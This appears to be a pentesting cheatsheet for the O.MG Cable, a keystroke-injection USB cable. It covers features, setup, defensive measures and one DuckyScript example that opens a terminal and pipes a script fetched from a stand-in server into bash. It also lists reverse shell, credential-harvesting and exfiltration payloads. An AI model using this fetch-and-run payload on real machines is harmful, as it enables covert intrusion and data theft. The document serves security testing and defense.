Skip to content

O.MG Cable Cheatsheet

O.MG Cable Cheatsheet

Overview

The O.MG Cable is a malicious USB cable that looks and functions like a regular USB cable, but has an embedded web server, Wi-Fi access point, and keystroke injection capabilities. It is a powerful tool for physical social engineering and penetration testing.

Key Features

  • Covert: Indistinguishable from a regular USB cable.
  • Keystroke Injection: Can inject pre-programmed keystroke sequences.
  • Web UI: Can be configured and controlled via a web interface.
  • Wi-Fi Access Point: Creates its own Wi-Fi network for remote access.
  • Self-Destruct: Can be remotely wiped to remove all traces of its malicious functionality.
  • Geofencing: Can be configured to only activate in specific geographic locations.

Versions

  • USB-A to Lightning
  • USB-A to USB-C
  • USB-C to USB-C
  • USB-C to Lightning

Getting Started

  1. Power On: Plug the O.MG Cable into a USB port on a computer.
  2. Connect to Wi-Fi: The O.MG Cable will create a Wi-Fi network with an SSID like OMG-XXXX. Connect to this network.
  3. Access Web UI: Open a web browser and navigate to http://192.168.4.1 to access the web interface.
  4. Configure Payload: Use the web interface to configure and deploy keystroke injection payloads.

Payload Development

Payloads are written in DuckyScript, the same scripting language used by the USB Rubber Ducky.

Payload Structure:

REM Your payload logic here

REM Example: Open a terminal and download a script
GUI SPACE
DELAY 500
STRING terminal
ENTER
DELAY 500
STRING curl -sL https://your-server.com/payload.sh | bash
ENTER

Common Payloads

  • Reverse Shell: Establish a reverse shell to a remote server.
  • Credential Harvesting: Create a fake login prompt to capture credentials.
  • Data Exfiltration: Exfiltrate sensitive data to a remote server.
  • Ransomware Simulation: Simulate a ransomware attack.

Advanced Features

  • Triggers: Payloads can be triggered by specific events, such as connecting to a specific Wi-Fi network or plugging into a specific computer.
  • Geofencing: Payloads can be configured to only activate when the O.MG Cable is within a specific geographic area.
  • Self-Destruct: The O.MG Cable can be remotely wiped to remove all traces of its malicious functionality.

Detection and Defense

  • Physical Inspection: Inspect USB cables for any signs of tampering.
  • Network Monitoring: Monitor your network for any suspicious Wi-Fi networks.
  • USB Port Security: Use USB port blockers to prevent unauthorized devices from being connected to your computer.
  • Endpoint Detection and Response (EDR): Use an EDR solution to detect and block malicious keystroke injection attacks.

Additional Resources